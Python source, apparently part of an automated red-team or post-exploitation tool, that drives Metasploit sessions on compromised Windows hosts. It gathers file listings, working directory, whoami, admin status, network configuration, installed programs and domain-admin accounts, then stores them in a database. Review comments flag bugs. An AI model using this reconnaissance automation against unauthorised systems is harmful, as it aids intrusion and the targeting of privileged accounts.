def gatherFiles(self, msfclient, sessionInput):
    """Store the `ls` listing of a session's working directory in its Recon data.

    Runs `ls` on the session (30 s timeout), parses every output line with
    self.parseFileData and maps the parsed fields onto the names in
    desc_files. Directory entries that were never gathered receive the whole
    listing; entries gathered earlier are compared by file name, with known
    files passed to self.checkingFileChanges and unknown files appended.

    Nothing is stored when no Session document matches sessionInput.
    On MsfError the session is killed through the console; any other
    exception is logged and printed, never re-raised.
    """
    EventUtils.settingEvent(self, "Gathering file info from session " + sessionInput + ".")
    try:
        # Field names paired positionally with what parseFileData returns.
        desc_files = ['Mode', 'Size', 'Type', 'Last', 'Modified', 'TimeZone', 'Name']
        # The listing is produced by the remote host and stored as received;
        # treat it as untrusted data wherever it is later displayed or parsed.
        listofFiles = msfclient.client.sessions.session(sessionInput).run_with_output('ls', timeout=30).splitlines()
        session = Session.objects(_id=sessionInput).first()
        if session:
            recon = Recon.objects(_id=sessionInput).first()
            if not recon:
                # No Recon record yet: gather the working directory first, then re-read.
                Reconnaissance.gatherPWD(self, msfclient, sessionInput)
                recon = Recon.objects(_id=sessionInput).first()
            # NOTE(review): recon can still be None here if the call above stored
            # nothing; recon.pwd then raises AttributeError, which the broad
            # handler at the bottom only logs.
            # NOTE(review): this query is not limited to sessionInput. Every Recon
            # document holding a directory named recon.pwd is updated, and the
            # loop below touches every directory entry of those documents, not
            # only the matching one. Confirm that this is intended.
            directory = Recon.objects().filter(directory__dir_name=recon.pwd)
            if directory:
                for r in directory:
                    for d in r.directory:
                        if not d.gathered:
                            # First pass over this entry: take the listing as is.
                            d.gathered = True
                            for f in listofFiles:
                                file = self.parseFileData(f)
                                if not file:
                                    pass
                                else:
                                    files_mapped = dict(zip(desc_files, file))
                                    d.files.append(files_mapped)
                            r.save()
                        else:
                            # Entry seen before: index the stored names for the comparison.
                            current_files = []
                            for _dict in d.files:
                                current_files.append(_dict['Name'])
                            for f in listofFiles:
                                file = self.parseFileData(f)
                                if not file:
                                    pass
                                else:
                                    # Known file? file[6] lines up with 'Name' in desc_files.
                                    # NOTE(review): assumes parseFileData yields at least
                                    # seven fields; a shorter result raises IndexError.
                                    if file[6] in current_files:
                                        for found_dict in d.files:
                                            if file[6]==found_dict['Name']:
                                                self.checkingFileChanges(file, found_dict)
                                            else:
                                                pass
                                    else:
                                        # Unknown file: add its mapped fields to the entry.
                                        files_mapped = dict(zip(desc_files, file))
                                        d.files.append(files_mapped)
                            r.save()
    except MsfError:
        print(f"[!]Session {sessionInput} threw timeout error.")
        print("[!]Killing session...")
        # NOTE(review): sessionInput is interpolated into a console command;
        # confirm callers only ever pass a validated session id.
        msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
        time.sleep(10)
        pass
    except Exception as msg:
        # Broad catch: parsing and database errors end up here and are only reported.
        logger.info(msg)
        print(msg)
        pass
def deleteSessions():
    """Delete every stored Session, EscalationData and Recon document."""
    # Order: sessions, then escalation data, then recon data.
    for model in (Session, EscalationData, Recon):
        model.objects().delete()
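def gatherCurrentAdmin(self, msfclient, sessionInput):
    """Record whether the session holds administrative rights.

    Runs ``net sessions`` through PowerShell on the session (30 s timeout).
    An "Access is denied." line anywhere in the output means "not admin";
    otherwise the session is recorded as admin. The verdict is written to
    ``Recon.isAdmin``. When no Recon document exists for the session, one is
    created and linked to the Session. ``isAdmin`` is left untouched when the
    command returns no output lines, and nothing happens when no Session
    document matches ``sessionInput``.

    On MsfError the session is killed through the console, followed by a
    10 second pause. Other exceptions propagate to the caller.
    """
    EventUtils.settingEvent(self, "Gathering current admin on session " + sessionInput + ".")
    try:
        admin = msfclient.client.sessions.session(sessionInput).run_psh_cmd("net sessions", timeout=30)
        session = Session.objects(_id=sessionInput).first()
        if session:
            output_lines = admin.splitlines()
            # Decide over the whole output. Assigning per line lets the last
            # line win, so any line after "Access is denied." (for example a
            # trailing blank one) would flip the result to admin.
            is_admin = not any('Access is denied.' in line for line in output_lines)

            recon = Recon.objects(session_id=sessionInput).first()
            if recon:
                if output_lines:
                    recon.isAdmin = is_admin
            else:
                recon = Recon()
                recon.session_id = sessionInput
                recon._id = sessionInput
                session.recon_id.append(recon.session_id)
                if output_lines:
                    if is_admin:
                        EventUtils.settingEvent(self, "Session "+sessionInput+" is admin.")
                    else:
                        EventUtils.settingEvent(self, "Session "+sessionInput+" is not admin.")
                    recon.isAdmin = is_admin
            recon.save()
            session.save()
    except MsfError:
        print(f"[!]Session {sessionInput} threw timeout error.")
        print("[!]Killing session...")
        # NOTE(review): sessionInput is interpolated into a console command;
        # confirm callers only ever pass a validated session id.
        msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
        time.sleep(10)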
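def gatherDomain(self, msfclient, sessionInput):
    """Collect domain, domain-controller and "domain admins" data for a session.

    Runs the ``windows/gather/enum_domain`` post module and reads the
    "Domain: " and "Controller: " lines from its output, then runs
    ``windows/gather/enum_domain_group_users`` for the group 'domain admins'
    and collects the account names found on lines that mention the domain.
    The values are placed on a ReconDomain object and the session's Recon
    document is saved (a Recon object is created when none exists). Nothing
    is saved when no Session document matches ``sessionInput``.

    On MsfError the session is killed through the console; any other
    exception is printed, never re-raised.
    """
    try:
        EventUtils.settingEvent(self, "Gathering domain info from session " + sessionInput + ".")
        domain = ""
        # Placeholder values, kept when no "Controller: " line can be parsed.
        user_list = {'User': '******', 'IP': '0.0.0.0'}
        domain_user = []

        post = msfclient.client.modules.use('post', 'windows/gather/enum_domain')
        post['SESSION'] = sessionInput
        cid = msfclient.console
        run_enum_domain = msfclient.client.consoles.console(cid).run_module_with_output(post)
        # Module output originates from the remote host; parse it defensively.
        for line in run_enum_domain.splitlines():
            if '[-]' in line:
                print("[-] Issue gathering domain info!")
            elif "Domain: " in line:
                domain = line.split("Domain: ", 1)[1]
            elif "Controller: " in line:
                controller_fields = line.split("Controller: ", 1)[1].split()
                # Field 0 is used as the name and field 2 as the address, so
                # at least three whitespace-separated fields are required.
                if len(controller_fields) >= 3:
                    user_list['User'] = controller_fields[0].upper()
                    user_list['IP'] = controller_fields[2].replace(')', '')
                else:
                    print("[-] Issue gathering domain info!")
            else:
                print("[-] Issue gathering domain info!")

        post = msfclient.client.modules.use('post', 'windows/gather/enum_domain_group_users')
        post['GROUP'] = 'domain admins'
        post['SESSION'] = sessionInput
        # Uses msfclient.client.consoles, the same path as the first module
        # run above and the MsfError handler below.
        run_enum_domain_group_users = msfclient.client.consoles.console(cid).run_module_with_output(post)
        for line in run_enum_domain_group_users.splitlines():
            # An empty domain is a substring of every line, and a line without
            # a backslash has no account part to index.
            if not domain or domain not in line or '\\' not in line:
                continue
            users = line.split('\\')[1]
            # NOTE(review): presumably filters a "not ..." status message, but it
            # also drops any account whose name contains "not"; confirm.
            if 'not' not in users:
                domain_user.append(users)

        session = Session.objects(_id=sessionInput).first()
        if session:
            recon = Recon.objects(_id=sessionInput).first()
            if recon is None:
                recon = Recon()
            recon_domain = ReconDomain()
            recon_domain.domain = domain
            recon_domain.domain_controller = user_list
            recon_domain.domain_user = domain_user
            # NOTE(review): recon_domain is never assigned to recon in this
            # function, so recon.save() does not visibly persist it. The Recon
            # field it belongs to is not shown here; confirm and attach it.
            recon.save()
    except MsfError:
        print(f"[!]Session {sessionInput} threw timeout error.")
        print("[!]Killing session...")
        # NOTE(review): sessionInput is interpolated into a console command;
        # confirm callers only ever pass a validated session id.
        msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
        time.sleep(10)
    except Exception as msg:
        print(msg)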
def gatherWhoAmI(self, msfclient, sessionInput):
    """Store the output of ``whoami`` for a session in its Recon document.

    Runs ``whoami`` through PowerShell on the session (30 s timeout). For an
    existing Recon document the second output line is stored; for a newly
    created one the last non-empty output line is stored and the document is
    linked to the Session. An event carrying the stored value is emitted
    after saving. Nothing happens when no Session document matches
    ``sessionInput``.

    On MsfError the session is killed through the console; any other
    exception is logged and a generic message is printed.
    """
    EventUtils.settingEvent(self, "Gathering whoami data from session " + sessionInput +".")
    try:
        whoami = msfclient.client.sessions.session(sessionInput).run_psh_cmd("whoami", timeout=30)
        session = Session.objects(_id=sessionInput).first()
        if not session:
            return

        recon = Recon.objects(session_id=sessionInput).first()
        if recon:
            # NOTE(review): needs at least two output lines; fewer raises
            # IndexError, which the broad handler below only logs. The new-record
            # path picks its line differently; confirm both agree.
            recon.whoami = whoami.splitlines()[1]
        else:
            recon = Recon()
            recon.session_id = sessionInput
            recon._id = sessionInput
            session.recon_id.append(recon.session_id)
            non_empty = [entry for entry in whoami.splitlines() if entry != '']
            if non_empty:
                recon.whoami = non_empty[-1]

        recon.save()
        session.save()
        # The value comes from the remote host; it is written into the event text as received.
        EventUtils.settingEvent(self, "whoami data for session " +sessionInput+ ": " +recon.whoami+".")
    except MsfError:
        print(f"[!]Session {sessionInput} threw timeout error.")
        print("[!]Killing session...")
        # NOTE(review): sessionInput is interpolated into a console command;
        # confirm callers only ever pass a validated session id.
        msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
        time.sleep(10)
    except Exception as msg:
        logger.info(msg)
        print("There was an error!")
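def gatherInstalledPrograms(self, msfclient, sessionInput):
    """Store the installed-program list reported for a session.

    Writes ``run post/windows/gather/enum_applications`` to the session,
    waits 10 seconds, reads the session output and parses each line with
    ``self.parseProgramList``. Every parsed entry is mapped to a
    ``{'Name': ..., 'Version': ...}`` dict and appended to
    ``Recon.installedprg`` unless an identical entry is already stored.
    A Recon document is created and linked to the Session when none exists,
    and it is filled in the same call. Nothing is stored when no Session
    document matches ``sessionInput``.

    On MsfError the session is killed through the console; any other
    exception is logged and printed, never re-raised.
    """
    try:
        EventUtils.settingEvent(self, "Gathering installed program info from session " + sessionInput +".")
        program_desc = ['Name', 'Version']
        session = Session.objects(_id=sessionInput).first()
        msfclient.client.sessions.session(sessionInput).write('run post/windows/gather/enum_applications')
        # NOTE(review): the output is read once after a fixed wait; anything the
        # module prints later is presumably not seen by this call.
        time.sleep(10)
        run_post = msfclient.client.sessions.session(sessionInput).read()
        # Output originates from the remote host and is stored as parsed.
        listofPrograms = run_post.splitlines()
        if session:
            recon = Recon.objects(_id=sessionInput).first()
            if recon is None:
                recon = Recon()
                recon._id = sessionInput
                recon.session_id = sessionInput
                session.recon_id.append(recon.session_id)

            for p in listofPrograms:
                program = self.parseProgramList(p)
                if not program:
                    continue
                programs_mapped = dict(zip(program_desc, program))
                # Compare whole entries. Checking the stored keys against the new
                # entry's keys always matched ('Name'/'Version'), so later runs
                # never added anything, and appending inside that loop would
                # have modified the list while it was being iterated.
                if programs_mapped not in recon.installedprg:
                    recon.installedprg.append(programs_mapped)

            recon.gathered_programs = True
            recon.save()
            session.save()
    except MsfError:
        print(f"[!]Session {sessionInput} threw timeout error.")
        print("[!]Killing session...")
        # NOTE(review): sessionInput is interpolated into a console command;
        # confirm callers only ever pass a validated session id.
        msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
        time.sleep(10)
    except Exception as msg:
        logger.info(msg)
        print(msg)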
def gatherPWD(self, msfclient, sessionInput):
    """Store the session's current working directory in its Recon document.

    Runs ``pwd`` on the session (30 s timeout). A new Recon document is
    created and linked to the Session when none exists. Whenever the record
    is new or its stored ``pwd`` differs from the current one, ``pwd`` is
    updated and a ReconFiles entry named after the directory is appended to
    ``Recon.directory``. Nothing happens when no Session document matches
    ``sessionInput``.

    On MsfError the session is killed through the console; any other
    exception is logged and a generic message is printed.
    """
    EventUtils.settingEvent(self, "Gathering pwd from session " + sessionInput + ".")
    try:
        current_pwd = msfclient.client.sessions.session(sessionInput).run_with_output('pwd', timeout=30)
        session = Session.objects(_id=sessionInput).first()
        if not session:
            return

        recon = Recon.objects(session_id=sessionInput).first()
        created = not recon
        if created:
            recon = Recon()
            recon.session_id = sessionInput
            recon._id = sessionInput
            session.recon_id.append(recon.session_id)

        # A new record always gets its first directory entry; an existing one
        # only when the working directory has changed since the last call.
        # NOTE(review): returning to an earlier directory appends a second
        # entry with the same dir_name; confirm that duplicates are acceptable.
        if created or recon.pwd != current_pwd:
            recon.pwd = current_pwd
            dir_entry = ReconFiles()
            dir_entry.dir_name = current_pwd
            recon.directory.append(dir_entry)

        recon.save()
        session.save()
    except MsfError:
        print(f"[!]Session {sessionInput} threw timeout error.")
        print("[!]Killing session...")
        # NOTE(review): sessionInput is interpolated into a console command;
        # confirm callers only ever pass a validated session id.
        msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
        time.sleep(10)
    except Exception as msg:
        logger.info(msg)
        print("There was an error!")
def gatherNetwork(self, msfclient, sessionInput):
    """Store the session's network configuration in its Recon document.

    Runs ``ipconfig /all`` through PowerShell on the session (30 s timeout)
    and hands the output to ``self.parseIPData`` together with the Recon
    document, which is created and linked to the Session when none exists.
    Nothing is stored when no Session document matches ``sessionInput``.

    On MsfError the session is killed through the console, followed by a
    10 second pause. Other exceptions propagate to the caller.
    """
    EventUtils.settingEvent(self, "Gathering network info on session " + sessionInput + ".")
    try:
        session = Session.objects(_id=sessionInput).first()
        # The command runs even when no Session document is found.
        ip = msfclient.client.sessions.session(sessionInput).run_psh_cmd("ipconfig /all", timeout=30)
        if not session:
            return

        recon = Recon.objects(session_id=sessionInput).first()
        if not recon:
            recon = Recon()
            recon.session_id = sessionInput
            recon._id = sessionInput
            session.recon_id.append(recon.session_id)

        # Output originates from the remote host; parseIPData receives it unmodified.
        self.parseIPData(recon, ip)
        recon.save()
        session.save()
    except MsfError:
        print(f"[!]Session {sessionInput} threw timeout error.")
        print("[!]Killing session...")
        # NOTE(review): sessionInput is interpolated into a console command;
        # confirm callers only ever pass a validated session id.
        msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
        time.sleep(10)